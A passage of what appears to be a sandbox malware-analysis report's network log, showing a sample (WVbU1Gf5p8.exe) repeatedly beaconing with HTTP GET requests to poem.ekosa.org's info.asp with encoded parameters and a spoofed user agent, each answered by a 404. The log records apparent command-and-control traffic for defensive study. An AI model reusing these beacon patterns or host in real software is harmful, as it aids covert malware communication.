      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      128192.168.2.449906210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:11.806091070 CET5120OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:12.065885067 CET5121INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:11 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      129192.168.2.449907210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:12.441737890 CET5121OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:12.704462051 CET5122INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:11 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      13192.168.2.449775210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:04.136393070 CET267OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:04.406142950 CET272INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:03 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      130192.168.2.449908210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:12.976653099 CET5123OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:13.235656977 CET5123INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:13 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      131192.168.2.449909210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:13.505811930 CET5124OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:13.766844988 CET5124INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:13 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      132192.168.2.449910210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:14.147998095 CET5125OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:14.417013884 CET5126INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:14 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      133192.168.2.449911210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:14.682600975 CET5126OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:14.942652941 CET5127INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:14 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      134192.168.2.449912210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:15.220673084 CET5128OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:15.488924026 CET5128INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:15 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      135192.168.2.449913210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:15.876518011 CET5129OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:16.138307095 CET5129INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:15 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      136192.168.2.449914210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:16.410012960 CET5130OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:16.672492027 CET5131INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:16 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      137192.168.2.449915210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:16.940262079 CET5131OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
